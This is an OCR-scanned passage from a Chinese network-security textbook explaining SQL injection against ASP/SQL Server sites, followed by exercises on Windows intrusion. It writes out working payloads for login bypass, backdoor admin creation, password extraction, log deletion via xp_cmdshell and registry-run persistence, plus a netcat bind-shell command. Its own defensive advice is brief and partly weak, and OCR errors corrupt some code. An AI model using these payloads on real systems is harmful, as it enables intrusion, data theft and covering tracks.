(1) 脚本 注入 式 的 攻击 。 

(2) 恶意 数据 输入 ,用 来 影响 被 执行 的 SQL 脚本 。 

SQL 注入 漏洞 属于 Web 脚本 漏洞 , 它 是 Web 应 用 程序 开发 者 在 编程 过 程 中 ,未 对 
SQL 语句 传人 的 参数 进行 严格 的 检查 和 处 理 所 造 成 的 人 为 漏洞 。SQL 注入 成 功 后 ,攻击 者 
可 获得 对 网 站 后 台数 据 库 的 未 经 授权 的 访问 和 直接 检索 。 利 用 SQL 注入 技术 来 实施 的 网 
络 攻击 称 为 SQL 注入 攻击 。 

SQL 注入 漏洞 仅 存 在 于 有 数据 库 连 接 和 存 取 访 问 操作 的 应 用 程序 中 ,尤其 以 Web 应 
用 程序 为 主 。 在 Web 应 用 程序 中 ,交互 式 的 提交 表单 页 面 和 具有 接收 参数 能 力 的 网 页 , 才 
存在 SQL 注入 漏洞 的 可 能 ,具有 SQL 注入 漏洞 的 网 页 通常 称 为 一 个 SQL 注入 点 。 

在 动态 网 页 中 ,交互 式 的 提交 表单 页 面 所 提交 的 数据 ,大 多 数 是 SQL 数据 查询 的 条 件 
数据 。 攻 击 者 通过 在 交互 式 的 提交 表单 页 面 精心 构造 和 提交 数据 ,可 实现 在 构造 生成 的 
SQL 查询 语句 的 末尾 附加 上 额外 的 SQL 语句 元 素 , 从 而 达到 欺骗 数据 库 服 务 器 执行 非 授 
权 查 询 的 目的 ,这 就 是 SQL 注入 攻击 的 基本 原理 。 

在 SQL 注入 攻击 技术 中 ,最 简单 的 一 种 就 是 “ 单 引号 注入 ”。 下 面 以 网 站 后 台 的 用 户 名 
和 密码 输入 页 面 为 例 , 介 绍 “ 单 引号 注入 "攻击 的 实现 原理 和 方法 。 

网 站 后 台 系统 是 授权 访问 的 ,只 有 通过 身份 验证 的 合法 用 户 才能 访问 这 些 管理 性 质 的 
页 面 。 在 登录 页 面 的 用 户 名 和 密码 输入 框 中 所 输入 的 数据 ,是 要 构造 生成 的 SQL 查询 语句 
的 条 件 。 

假设 用 于 显示 用 户 名 和 密码 输入 界面 的 表单 页 面 为 login. asp, 用 户 名 输入 框 对 象 的 名 
称 为 userid. 密码 输入 框 的 名 称 为 pwd。 表 单 将 数据 提交 给 checklogin. asp 页 面 处 理 。 
checklogin. asp 页 面 接收 表单 所 提交 来 的 数据 ,构造 生成 SQL 查询 语句 ,然后 执行 SQL 查 
询 , 以 判断 检查 用 户 输入 的 用 户 名 和 密码 与 数据 表 中 所 存储 的 用 户 名 和 密码 是 否 一 致 , 若 一 
致 ,身份 验证 通过 ,页 面 跳 转 到 后 台 管 理 系 统 页 面 .允许 用 户 进入 和 访问 网 站 后 台 系统 。 

在 checklogin. asp 页 面 中 ,获得 表单 所 提交 来 的 数据 并 动态 构造 生成 SQL 查询 语句 的 
代码 如 下 : 

<% 


varuserid = Request. Form( "userid" ) 
varpwd = Request. Form(" pwd" ) 
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sqlstr = "Select * from userinfo where username = '" & varuserid & "' and pwd = '" & varpwd & "'" 

5> 

车 在 用 户 名 输入 框 中 输入 “admin”, 在 密码 输入 框 中 输入 “letmein”, 则 最 后 构造 生成 的 
SQL 查询 语句 为 ， 

Select * from userinfo where username = 'admin' and pwd = 'letmein' 

从 中 可 见 ,所 构造 生成 的 SQL 查询 语句 是 正确 的 。 但 如 果 攻击 者 在 用 户 名 输入 框 中 输 
入 "admin”, 而 在 密码 输入 框 中 输入 ; 

anystring' or '1' = '1 


此 时 所 构造 生成 的 SQL 查询 语句 为 : 


Select * from userinfo where username= 'admin' and pwd = 'anystring' or 'l'='1' 
从 其 条 件 表达 式 可 见 , 该 条 件 恒 为 真 , 用 户 身份 得 到 验证 通过 ,可 成 功 进 入 后 台 系统 , 系 
统 安全 被 攻破 。 


另外 ,也 可 在 用 户 名 输入 框 中 输入 "admin' or 1=1 --”, 在 密码 输入 框 中 输入 任意 字 
符 , 比 如 letmein, 则 此 时 的 SQL 查询 语句 就 变 为 : 

Select * from userinfo where username = 'admin' or 1=1 -- ' and pwd= 'letmein' 

H“ -- ”是 SQL 的 注释 符 , 因 此 ,以 上 SQL 语句 等 价 于 以 下 语句 : 

Select w from userinfo where username = 'admin' or 1 = 1 


此 时 查询 条 件 也 恒 为 真 ,虽然 表达 方式 不 同 , 但 实现 原理 和 达到 的 目的 相同 。 

对 于 “ 单 引 号 注入 "攻击 的 防范 ,可 在 构造 生成 SQL 查询 语句 之 前 ,将 表单 所 提交 来 的 
数据 进行 过 滤 ,比如 过 滤 掉 单 引 号 .空格 字符 、-- 和 or 等 关键 字 。 另 外 ,也 可 通过 比较 密 
文 的 方式 来 进行 判断 ,此 时 的 代码 变 为 : 

<% 

varuserid = md5 (Request. Form( "userid" ) ) 

varpwd = md5 (Request. Form( "pwd" ) ) 

sqlstr = "Select * from userinfo where username = '" & varuserid & "' and pwd = '" & varpwd & "'" 

*%> 


此 时 保存 账户 和 密码 信息 的 userinfo 数据 表 中 的 username 和 pwd 字段 ,应 分 别 保存 
账户 和 密码 的 MD5 值 。 

2. SQL 注入 攻击 的 特点 与 危害 

SQL 注入 攻击 是 通过 正常 的 Web 访问 来 进行 的 ,与 正常 的 网 页 访问 没有 什么 区 别 ,无 
法 利用 防火 墙 来 对 SQL 注入 攻击 进行 有 效 的 防范 。SQL 注入 攻击 的 危害 性 较 大 ,注入 攻 
击 成 功 后 ,网 站 后 台 账 户 名 和 密码 可 被 攻击 者 所 获取 ,之 后 利用 该 账户 登录 后 台 管理 系统 ， 
从 而 导致 攻击 者 可 任意 自 改 网 站 数据 或 导致 数据 的 严重 泄密 。 因 此 ,在 一 定 程度 上 ,其 安全 
风险 高 于 其 他 漏洞 。 目 前 ,SQL 注入 攻击 已 成 为 对 网 站 攻击 的 主要 手段 之 一 。 

SQL 注入 攻击 具有 一 定 的 隐蔽 性 。 如 果 注 和 攻击 成 功 后 ,攻击 者 并 不 急 着 破坏 或 修改 
网 站 数据 ,管理 员 又 没有 查看 IIS 日 志 的 习惯 , 则 可 能 被 人 侵 很 长 时 间 了 都 不 会 发 觉 。 

3. SQL 注入 攻击 的 基本 步骤 

SQL 注入 攻击 可 以 手工 进行 ,也 可 利用 SQL 注入 攻击 软件 (HDSI.Domain NBSI 等 ) 
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来 自动 进行 。 

(1) 寻找 SQL 注入 点 

表单 数据 提交 到 的 处 理 页 面 和 具有 参数 传人 和 接收 能 力 的 网 页 , 才 有 可 能 存在 SQL 注 
入 漏洞 ,因此 ,应 在 这 类 网 页 中 查找 SQL 注入 点 。 

判断 网 页 是 否 存在 SQL 注入 漏洞 .可 利用 前 面 介绍 的 “ 单 引号 注入 ”方法 ,输入 精心 构 
造 的 特殊 字符 串 , 通 过 浏览 器 是 否 返回 错误 信息 ,以 及 具体 的 错误 信息 来 判断 是 否 存在 
SQL 注入 漏洞 。 如 果 返 回 错误 信息 , 则 表明 程序 未 对 输入 的 数据 进行 过 滤 处 理 ,SQL 语句 
被 执行 了 ,只 是 执行 出 错 。 

(2) 获取 有 关 数 据 库 方面 的 信息 

获得 有 关 数 据 库 方面 的 信息 ,是 SQL 注入 过 程 中 一 个 比较 关键 的 部 分 。 可 通过 注入 相 
关 SQL 语句 ,来 了 解数 据 库 是 否 支持 子 查询 ,是 否 支 持 多 名 查询 、 保 存 用 户 账户 的 数据 表 名 
以 及 保存 账户 名 和 密码 的 字段 的 名 称 、 数 据 库 是 否 存 在 xp_cmdshell 存储 过 程 等 方面 的 
信息 。 

(3) 实施 注入 攻击 ,获得 对 目标 计算 机 的 控制 权 

如 果 目 标 主机 是 SQL Server 类 型 的 数据 库 ,SQL Server 数据 库 内 置 有 xp_cmdshell £f: 
储 过 程 ,在 获得 sa 账户 权限 后 ,利用 该 存储 过 程 可 以 直接 添加 管理 员 账 户 、 开 放 3389 远程 
终端 服务 或 执行 其 他 任意 DOS 命令 。 

车 没有 xp_cmdshell 存储 过 程 , 则 可 利用 注入 攻击 获得 或 添加 后 台 管 理 账户 和 密码 , 然 
后 利用 后 台中 的 文件 上 传 功能 ,上 传 网 页 木马 (比如 海 阳 顶 端 ASP 木马 ) 来 获得 对 目标 主机 
的 控制 权 。 

海 阳 顶端 ASP 木马 一 旦 被 复制 到 网 站 ,客户 端 只 需 用 IE 浏览 器 访问 ASP 木马 网 页 ， 
就 可 在 Web 界面 上 轻松 地 控制 目标 计算 机 ,并 能 实现 文件 上 传 下 载 ,删除 操作 用户 添加 、 
文件 修改 和 远程 执行 程序 等 操作 。 

在 利用 SQL 注入 攻击 获得 后 台 的 用 户 名 和 密码 时 , 若 密码 是 MD5 值 ,可 通过 http:// 
www. md5. net 网 站 试 着 破解 出 密码 明文 。 不 过 .对 于 简单 的 密码 ,该 方法 可 行 ,对 于 复杂 
的 密码 ,破解 难度 较 高 。 若 是 通过 注入 方式 ,直接 向 目标 主机 的 后 台 添 加 管理 账户 ,要 注意 
区 分 目标 后 台 的 密码 是 明文 还 是 MD5 值 .若是 MD5 值 , 则 可 先 将 要 添加 账户 的 密码 转换 
成 MD5 值 ,然后 再 通过 注入 的 方式 添加 到 后 台 管 理 账 户 数据 表 中 。 

4. SQL 注入 相关 技术 

在 进行 SQL 注入 攻击 时 ,会 充分 利用 SQL 语句 的 特点 ,通过 精心 构造 注入 语句 来 达到 
非 授权 执行 SQL 语句 的 目的 。 使 用 的 技巧 主要 有 如 下 几 种 。 

(1) 通过 使 用 分 号 来 构造 多 句 查 询 , 实 现 同时 执行 注入 的 SQL 语句 。 

SQL Server 2000/2005/2008 Oracle 等 服务 器 型 数据 库 ,一 般 都 支持 多 句 查 询 。 例 如 ， 
在 前 面 介绍 的 用 户 名 和 密码 输入 表单 页 面 中 , 若 用 户 名 输入 “admin”, 而 密码 框 输入 以 下 
内 容 : 

123'; insert into userinfo(username, pwd, enabled) values('webadmin', '24361',1); -— 


表单 数据 提交 后 ,在 表单 数据 处 理 页 面 动 态 构造 生成 的 SQL 查询 语句 ,此 时 就 变 为 以 
FAR: 
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Select * from userinfo where username = 'admin' and pwd= '123'; insert into userinfo(username, 

pwd, enabled) values( 'webadmin', '24361',1); -— ' 

以 上 SQL 语句 在 语法 上 是 正确 的 ,可 以 被 执行 ,执行 后 的 结果 就 是 在 目标 主机 的 后 台 
管理 账户 数据 表 (userinfo) 中 添加 了 一 个 管理 账户 。 以 后 就 可 使 用 自己 添加 的 webadmin 
账户 来 登录 后 台 。 

如 果 将 注入 的 insert into 语句 替换 成 drop table 语句 ,还 可 实现 对 指定 数据 表 的 删除 
操作 。 如 果 替 换 成 update 语句 ,可 实现 对 指定 数据 表 数 据 的 修改 操作 。 例 如 ,将 注入 的 
SQL 语句 替换 为 以 下 update 语句 ,可 将 SQL Server 数据 库 的 sa 账户 的 密码 更 改 为 
111192”; 


update master. dbo. sysx1ogins set password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67A 

F19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid = 0x01 

(2) 使 用 SQL H“ -- "注释 符 ,注释 掉 不 需要 的 内 容 。 

在 本 示例 中 ,密码 属于 字符 串 数据 类 型 ,在 表单 数据 处 理 页 面 动态 构造 SQL 语句 时 ， 
会 在 输入 的 密码 字符 串 的 末尾 ,添加 字符 串 常量 对 应 的 后 单 引 号 。 对 于 注入 的 SQL 请 
句 , 若 最 终生 成 的 SQL 语句 已 是 完整 的 了 ,比如 上 面 注 入 的 insert into 语句 , 则 这 个 后 单 
引号 就 是 多 余 的 ,此 时 就 可 在 注入 的 SQL 语句 的 末尾 添加 上 *; -- ”。 其 中 的 “; "为 后 面 
一 个 SQL 语句 的 结束 符 ,“-- "为 注释 符 , 之 后 的 内 容 被 注释 掉 , 这 样 后 单 引号 就 被 注释 
掉 了 。 

若 用 户 所 接收 的 数据 是 数值 类 型 , 则 在 构造 生成 SQL 语句 时 ,不 会 在 数据 的 后 面 附加 
后 单 引号 ,此 时 就 不 需要 使 用 * -- ”注释 符 。 比 如 ,在 利用 以 下 类 似 的 注入 点 进行 SQL 注 
入 时 ,就 不 需要 使 用 " -- ”注释 符 。 

注 人 点 : http://ip_address/show.asp?newsid = 12 

注入 方法 示例 : 

http://ip address/ show.asp?newsid = 12; insert into userinfo(username, pwd, enabled) values( 'webadmin', 

*24361%;1); 

show. asp 网 页 用 于 显示 指定 新 闻 ID 的 内 容 。 接 收 到 要 显示 新 闻 的 ID 值 后 ,show. asp 网 
页 中 的 ASP 代码 ,首先 会 动态 构造 生成 SQL 查询 语句 ,然后 再 执行 该 SQL 语句 以 返回 记 
录 集 。 其 中 ,构造 生成 SQL 查询 语句 的 ASP 代码 一 般 为 : 

<% 

nid = Request. QueryString("newsid") 

sqlstr = "Select * From news Where id=" & nid 

*%> 

在 浏览 器 的 地 址 栏 输入 以 上 带 有 SQL 注入 的 URL 地 址 后 ,最 后 构造 生成 的 SQL 语句 
如 下 : 

Select * From news Where id= 12; insert into userinfo(username, pwd, enabled) values('webadmin', 

'24361',1); 

show. asp 网 页 在 执行 该 SQL 查询 语句 时 ,注入 的 Insert into 语句 也 会 被 同时 执行 ,最 
后 账户 添加 成 功 。 
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(3) 通过 构造 子 查询 ,实现 对 注入 SQL 语句 的 执行 。 

可 将 要 注入 的 SQL 语句 构造 到 子 查询 中 ,从 而 实现 SQL 的 注入 并 得 到 执行 。 

子 查询 是 一 个 租 套 在 Select, Insert, Update, Delete 等 SQL 语句 中 的 查询 。 在 SQL 语 
句 中 ,任何 允许 使 用 表达 式 的 地 方 都 可 以 伐 套 使 用 子 查询 。 常 用 的 构造 子 查询 的 方法 有 如 
下 几 种 。 

O 在 SQL 的 条 件 表达 式 中 ,使 用 in 或 not in any, some 或 all 关键 字 , 结 合 使 用 比较 


运算 符 来 构造 子 查询 。 
© 在 SQL 的 条 件 表达 式 中 ,直接 使 用 比较 运算 符 来 构造 子 查询 。 此 时 子 查询 的 返回 
值 必须 是 单个 值 。 


© 通过 使 用 exists 或 not exists 关键 字 来 构造 子 查询 。 

@ 使 用 union (并 集 操 作 ) intersect (交集 操作 ) 或 minus ( 差 集 操作 ) 关 键 字 构造 子 
查询 。 

例如 ,在 用 户 名 和 密码 输入 表单 中 ,用 户 名 输入 admin, 若 在 密码 输入 框 中 输入 "123' and 
exists (select * from sysobjects); --”, 则 最 后 构造 生成 的 SQL 查询 语句 为 : 

Select * from userinfo where username = 'admin' and pwd = '123' and exists (select * from 

sysobjects); -- ' 

此 时 就 构造 生成 了 一 个 带子 查询 的 SQL 语句 , 子 查询 为 注入 的 ”select * from 
sysobjects 语句。 关键 字 exists 用 于 进行 存在 性 判断 , 若 后 面 的 表达 式 有 返回 值 , 则 返回 好 
辑 值 真 , 和 否则 返回 迎 辑 值 假 。 该 注入 语句 ,通常 用 于 判断 数据 库 是 否 是 SQL Server 类 型 的 
数据 库 。 若 执行 未 报错 , 则 说 明 存在 sysobjects 数据 表 , 是 SQL Server 类 型 的 数据 库 ; 若 执 
行 后 提示 sysobjects 对 象 名 无 效 , 则 说 明 不 存在 sysobjects 数据 表 , 不 是 SQL Server 类 型 的 
数据 库 。 

(4) 通过 SQL 注入 ,人 为 制造 SQL 语句 的 语法 错误 ,通过 错误 信息 的 输出 ,获得 注入 
的 SQL 语句 的 查询 数据 。 通 常 可 采取 让 SQL 语句 在 进行 数据 类 型 转换 时 出 错 的 方式 来 
实现 。 

例如 , 若 要 获知 SQL Server 数据 库 的 版 本 信息 , 则 可 在 密码 输入 框 中 输入 *123' and 1 一 
(Select @@ VERSION); --”, 最 后 构造 生成 的 SQL 查询 语句 为 : 

Select x from userinfo where username = 'adnin' and pd = '123' and 1 = (Select @(@VERSION) ; --， 

该 SQL 语句 被 执行 时 将 报 语法 错误 ,其 错误 信息 如 下 : 

Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 


将 nvarchar fË 'Microsoft SQL Server 2000-8. 00. 760 (Intel x86) Dec 17 2002 14:22; 
05 Copyright (c) 1988— 2003 Microsoft Corporation Enterprise Edition on Windows NT 
5.2 (Build 3790; Service Pack 2) ' 转换 为 数据 类 型 为 int 的 列 时 发 生 语 法 错误 。 

从 以 上 错误 信息 可 见 , 注 入 的 SQL 语句 “Select @@VERSION” 的 查询 结果 ,在 错误 信 
息 中 被 完整 地 输出 了 。 

若 要 获得 当前 数据 库 的 名 称 , 则 可 在 密码 输入 框 中 输入 "123' and 0 db_name(0); -一 ” 
或 “123' and 1=convert(int.db_name(0)); -- ”. 此 时 构造 生成 的 SQL 查询 语句 为 : 
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Select * from userinfo where username = 'admin' and pwd = '123' and 0<> db _name(0); -— 
或 
Select * from userinfo where username = 'adnin' and pwd = '123' and 1 = convert(int,db name(0)); —— 


db_name(database_id) 函 数 用 于 返回 指定 数据 库 ID 的 数据 库 的 名 称 。 若 要 获得 当前 
数据 库 的 名 称 ,ID 值 设置 为 0 或 不 指定 ID 值 , 即 db_name(0) 或 db_name() 。convert( ) 为 
数据 类 型 转换 函数 。 

执行 以 上 SQL 语句 时 ,在 进行 数据 类 型 转换 时 将 出 现 语法 错误 ,其 错误 信息 如 下 所 示 : 


Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 


将 nvarchar 值 "mywebdata' 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 错误 。 

从 输出 的 错误 信息 可 见 , 当 前 正在 使 用 的 数据 库 的 名 称 为 mywebdata。 

基于 同样 的 思路 和 技巧 ,在 密码 输入 框 中 输入 "123' and 1 = (select username from 
userinfo where id=1); --”, 可 获得 userinfo 数据 表 中 ,id 值 为 1 的 记录 的 username 字段 
的 值 , 即 获得 用 户 的 账户 名 称 。 通 过 改变 id 的 值 ,可 获得 各 个 账户 的 名 称 。 改 变 查 询 字 段 ， 
比如 更 改 为 保存 密码 的 pwd 字段 , 则 可 获得 账户 的 密码 值 。 

比如 在 密码 输入 框 中 输入 *123' and 1= (select pwd from userinfo where id=2); -- ”, 执 
行 后 的 错误 信息 为 : 


Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 


将 varchar 值 'letmein' 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 错误 。 

从 中 可 见 ,id 值 为 2 的 记录 的 账户 密码 为 letmein。 若 执行 后 不 报错 , 则 说 明 数 据 类 型 
转换 没有 问题 ,密码 字符 串 可 以 转换 为 整 型 (int), 这 说 明 密码 是 纯 数字 字符 。 

(5) 利用 exec 调用 执行 存储 过 程 ,实现 执行 DOS 命令 或 实现 对 注册 表 的 写 操作 。 

(D master. dbo. xp_cmdshell 存储 过 程 。 

master. dbo. xp_cmdshell 是 SQL Server 数据 库 内 置 的 一 个 扩展 存储 过 程 , 利 用 该 存储 
过 程 ,可 实现 通过 注入 方式 在 远程 目标 主机 上 执行 DOS 命令 。 

例如 , 若 要 通过 SQL 注入 的 方式 ,删除 目标 主机 中 2010-07-14 日 产生 的 Web 服务 日 志 
文件 (C:\winnt\system32\logfiles\W3SVCl\ex100714. log). 

a 对 于 提交 表单 ,在 密码 输入 框 中 输入 以 下 内 容 即 可 实现 。 


123'; exec master. dbo. xp_cmdshe11 'del c:\winnt\system32\logfiles\W3SVC1\ex100714. 1og > c:\ 
temp. txt'; 一 一 


b. 对 于 能 接收 数值 型 参数 的 show. asp 页 面 ,注入 方法 为 : 


http://ip_address/show. asp? id = 1; exec master. dbo. xp_cmdshell ' del c: \winnt\ system32 \ 
logfiles\W3SVC1\ex100714. log> c:\temp. txt'; 
将 含有 攻击 入 侵 记 录 的 Web 服务 的 日 志文 件 删除 后 ,可 再 次 通过 调用 xp_cmdshell 存储 
过 程 ,执行 copy 命令 ,将 其 他 日 志文 件 复制 为 被 删除 的 日 志文 件 ,以 避免 引起 管理 员 的 注意 。 
要 判断 xp_cmdshell 扩展 存储 过 程 是 否 存在 .可 通过 以 下 方法 来 判断 。 
a 对 于 提交 表单 ,在 密码 输入 框 中 输入 以 下 内 容 。 表 单数 据 提交 后 , 若 不 报错 , 则 存在 
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该 存储 过 程 。 
123' and 1 = (select count( * ) from master. dbo. sysobjects where xtype = 'X' and name = 'xp_ 


cmdshel1' ) ; 一 一 


b. 对 于 能 接收 数值 型 参数 的 show. asp 页 面 ,实现 判断 的 注入 方法 为 : 

http://ip_address/show. asp?id = 1 and 1 = (select count( * ) from master. dbo. sysobjects where 

xtype = 'X' and name = 'xp_cmdshell') 

车 xp_cmdshell 扩展 存储 过 程 不 存在 ,还 可 通过 调用 master. dbo. sp_addextendedproc 
存储 过 程 来 恢复 添加 ,其 注入 实现 方法 为 : 


123' ;exec master. dbo. sp_addextendedproc 'xp_cmdshe11' , 'xplog70. d11' ; —— 
或 http://ip_address/show. asp? id = 1; exec master. dbo. sp _ addextendedproc 'xp_ cmdshe11 ' , ' 
xplog70.d11' ; 


在 查询 分 析 器 中 ,也 可 通过 执行 以 下 SQL 语句 来 添加 xp_cmdshell 扩展 存储 过 程 。 
sp_addextendedproc xp_cmdshe11, @ d11name = 'xplog70. d11 ' 


管理 员 出 于 安全 考虑 ,可 能 会 删除 xp_cmdshell 扩展 存储 过 程 , 并 可 能 同时 将 xplog70. dll 
文件 也 一 并 删除 。 此 时 可 通过 上 传 xplog70. dll 文件 来 恢复 xp_cmdshell 扩展 存储 过 程 。 
上 传 的 xplog70. dll 文 件 车 不 在 默认 的 位 置 (SQL Server 安装 目录 下 的 Binn 文件 夹 ), 则 应 
在 文件 名 前 指明 路 径 。 

若 要 删除 "xp_cmdshell" 扩 展 存储 过 程 ,可 调用 master. dbo. sp_dropextendedproc 存储 
过 程 来 实现 ,其 注入 实现 方法 为 : 


123' ;exec master. dbo. sp_dropextendedproc 'xp_cmdshell'; —— 


另外 ,还 可 通过 注入 的 方式 调用 执行 master. dbo. sp_password 存储 过 程 ,以 实现 对 sa 
等 账户 密码 的 修改 。 例 如 : 


123' ;exec master. dbo. sp_password @old = null, @new = 'newpwd', (@ loginame = 'sa'; -- 


SQL Server 数据 库 系统 内 置 了 众多 的 存储 过 程 ,这些 存 储 过 程 功能 很 强大 ,在 SQL 注 
入 攻击 中 经 常 被 使 用 到 。 要 熟练 运用 SQL 注入 技术 ,必须 对 SQL 语句 和 存储 过 程 有 充分 
的 理解 和 掌握 。 

@ master. dbo. xp_regwrite 存储 过 程 。 

master. dbo. xp_regwrite 存储 过 程 可 用 于 实现 对 注册 表 的 写 操作 。 通 过 向 注册 表 的 自 
动 运行 项 中 添加 数据 项 ,可 实现 系统 启动 时 自动 运行 指定 的 命令 。 

例如 ,车 要 通过 SQL 注入 的 方式 ,实现 向 目标 主机 添加 一 个 名 为 admin 的 系统 账户 , 密 
码 设置 为 letmein。 则 注入 方法 为 : 

123' ; exec master. dbo. xp_ regwrite ' HKEY LOCAL _ MACHINE ', ' SOFTWARE \ Microsoft \ Windows \ 

CurrentVersion\Run', 'item', 'REG_SZ', 'cmd. exe /c net user admin letmein /add'; —— 

5. SQL 注入 攻击 的 检查 与 防范 

C) SQL 注入 攻击 的 检查 

对 SQL 注入 攻击 的 检查 分 为 人 侵 前 的 自 查 和 入 侵 后 的 检查 。 入 侵 前 的 检查 主要 是 预 
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防 SQL 注入 攻击 ,检查 是 否 存在 SQL 注入 漏洞 。 这 可 通过 手工 方式 或 SQL 注入 工具 来 进 
行 检查 。 对 于 SQL 注入 攻击 后 的 检查 ,可 通过 查看 IIS 日 志和 数据 库 临时 表 方面 进行 
检查 。 

O HS 日 志 检查 。SQL 注入 攻击 过 程 中 ,往往 会 大 量 访问 某 一 个 动态 网 页 (SQL 注入 
点 ) ,日志 文件 会 急剧 增加 ,并 且 日 志文 件 会 记录 用 户 所 访问 的 URL 地 址 ,在 这 些 URL 地 
址 中 ,包含 有 所 注入 的 SQL 语句 。 因 此 ,通过 查看 日 志文 件 的 大 小 和 内 容 ,可 判断 是 否 发 生 
过 SQL 注入 攻击 以 及 攻击 是 否 成 功 。 

@ 检查 后 台数 据 库 ,查看 是 否 有 异常 的 临时 表 。 使 用 SQL 注入 攻击 软件 进行 注入 攻 
击 时 ,一 般 会 在 数据 库 中 创建 临时 表 , 并 利用 临时 表 来 存储 攻击 者 想 获 取 的 数据 (比如 磁盘 
目录 文件 列表 、 用 户 账户 列表 等 )。 因 此 ,通过 查看 检查 后 台数 据 库 是 否 有 新 建 的 数据 表 以 
及 表 结 构 和 表 内 容 , 有 助 于 判断 是 否 曾 发 生 过 SQL 注入 攻击 。 

(2) SQL 注入 攻击 的 防范 

D 对 网 站 内 容 进 行 清理 ,移出 或 删除 不 需要 的 交互 式 提交 表单 页 面 或 者 是 能 接收 参数 
的 页 面 。 另 外 ,网 站 中 不 要 存放 备份 网 页 ,更 不 能 将 备份 网 页 的 扩展 名 更 改 为 . bak 都 类 似 
的 名 称 , 和 否则 网 页 将 被 下 载 , 导 致 源 代码 泄露 。 

@ 在 服务 端正 式 处 理 数据 之 前 ,对 数据 的 合法 性 进行 检查 ,并 过 滤 掉 SQL 注入 常用 的 
关键 字 或 符号 。 

© 屏蔽 出 错 信息 。 对 于 ASP 动态 网 页 ,可 在 ASP 代码 的 开头 添加 “on error resume 
next” 语 句 。 

@ 对 敏感 信息 进行 加 密 存 储 。 比 如 ,后 台 管理 系统 的 账户 密码 应 加 密 存储 ,以 防止 攻 
击 者 通过 SQL 注入 的 方式 ,获得 账户 的 密码 。 


习 题 2 


1. 关于 网 络 服务 与 端口 的 描述 ,不 正确 的 是 ( Ja 
A. 网 络 服务 使 用 端口 进行 侦 听 服务 
B. 不 同 的 网 络 服务 使 用 不 同 的 端口 ,因此 ,根据 目标 主机 所 开放 的 端口 ,可 大 体 知 
道 目 标 主机 提供 了 哪些 网 络 服务 
C. 一 个 网 络 服务 只 能 使 用 一 个 TCP 或 UDP 端口 
D. 一 个 网 络 服务 可 以 使 用 一 个 或 多 个 TCP 或 UDP 端口 
2. 以 下 工具 软件 中 ,不 能 用 来 破解 Windows 操作 系统 密码 的 是 ( 


A. smbcrack B. LC5 C. SAMInside D. sniffer 
3. 要 与 目标 主机 建立 IPC$ 远程 连接 ,目标 主机 必须 开放 的 端口 是 ( )。 
A. TCP 135 B. TCP 139 
C. TCP 445 D. TCP 139 sk TCP 445 
4. 以 目标 主机 的 管理 员 账户 成 功 建立 IPC $ 远程 连接 后 .可 实现 的 功能 有 ( Je 
A. 获得 目标 主机 的 Shell B. 在 目标 主机 安置 木马 病毒 


C. 对 目标 主机 的 系统 账户 进行 克隆 D. 获得 对 目标 主机 的 完全 控制 权限 
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5. 将 目标 主机 共享 的 资源 映射 为 本 地 机 的 网 络 磁盘 ,可 使 用 ( ) 命 令 来 实现 。 


A. net share B. net user C. net use D. net view 
6. 在 Windows 的 DOS Shell 命令 行 ,用 于 实现 对 系统 账户 进行 管理 的 命令 是 ( )。 
A. net share B. net user C. net use D. net view 


7. 要 将 新 创建 的 admin 账户 的 权限 提升 为 管理 员 权限 ,以 下 命令 中 正确 的 是 ( yi 
A. net user admin administrators /add 
B. net localgroup administrators 
C. net localgroup administrator admin /add 
D. net localgroup administrators admin /add 
8. 在 获得 目标 主机 的 远程 Shell 后 , 若 要 在 Shell 命令 行 停止 目标 主机 的 Web 服务 ,以 
下 命令 中 正确 的 是 (。”)。 


A. net stop web B. net stop w3c 
C. net stop w3svc D. net stop http 
9. 要 查看 或 同步 远程 目标 主机 的 时 间 , 可 使 用 ( ) 命 令 来 实现 。 
A. net view B. net time C. net use D. net datatime 


10. 假设 目标 主机 的 IP 地 址 为 192. 168. 168. 15, 现 要 将 目标 主机 的 Shell 绑 定 到 
TCP 8080 端口 ,以 下 命令 中 可 实现 该 功能 的 是 ( )。 
A. nc -| -p 8080 -e cmd. exe B. nc 192. 168. 168. 15 8080 
C. nc -l -p 8080 D. nc -e cmd. exe 192. 168. 168. 15 8080 
11. 在 成 功 建立 IPC$ 远程 连接 后 ,要 在 目标 主机 定时 执行 指定 的 命令 ,可 使 用 ( ) 
命令 来 实现 。 
A. at B. nc C. sc D. netsvc 
12. 在 成 功 建立 IPC $ 远程 连接 后 .要 查询 或 管理 目标 主机 的 网 络 服务 ,可 使 用 ( ) 
命令 来 实现 。 
A. nc B. netsvc C. at D. sc 
13. 在 成 功 建立 IPC $ 远程 连接 后 , 若 要 设置 修改 目标 主机 上 的 某 一 个 网 络 服务 的 启 
动 类 型 ,可 使 用 ( ) 命 令 来 实现 。 
A. nc B. netsvc C. at D: se 
14. 以 下 关于 Windows 系统 账户 的 描述 ,不 正确 的 是 ( D)e 
A. 更 改 一 个 账户 的 名 称 时 ,其 SID 值 不 会 被 改变 
B. 对 于 Windows 系统 ,其 管理 员 账 户 的 SID 值 默认 为 0x1F4 
C. 删除 一 个 账户 之 后 ,再 创建 一 个 同名 的 账户 ,其 SID 值 仍 为 原来 的 值 
D. Windows 的 账户 和 权限 信息 保存 在 注册 表 中 
15. 以 下 关于 Windows 系统 账户 克隆 的 描述 ,不 正确 的 是 ( Ja 
A. 只 能 在 目标 主机 的 本 地 进行 操作 ,才能 对 系统 账户 进行 克隆 操作 
B. 若 能 利用 目标 主机 的 管理 员 账 户 成 功 创建 IPC $ 远程 连接 , 则 可 利用 目标 主机 
的 远程 Shell, 实 现 对 目标 主机 中 的 任意 账户 的 克隆 操作 
C. 若 成 功 将 管理 员 账 户 克隆 到 Guest 账户 ,Guest 账户 即使 被 禁用 ,也 仍 能 正常 
登录 连接 
66 


第 2 章 网络 攻 击 与 入 侵 途 公 


D. 可 以 利用 ca 或 mt 等 工具 来 实现 账户 的 克隆 
16. 对 于 创设 账户 后 门 , 以 下 做 法 中 其 隐蔽 性 最 差 的 是 ( ja 
A. 创建 一 个 以 “$ "字符 结尾 的 账户 ,并 将 该 账户 添加 到 Administrators 组 中 
B. 将 管理 员 账 户 克隆 到 Guest 账户 ,并 禁用 Guest 账户 
C. 将 管理 员 账 户 克隆 到 Internet 匿名 账户 
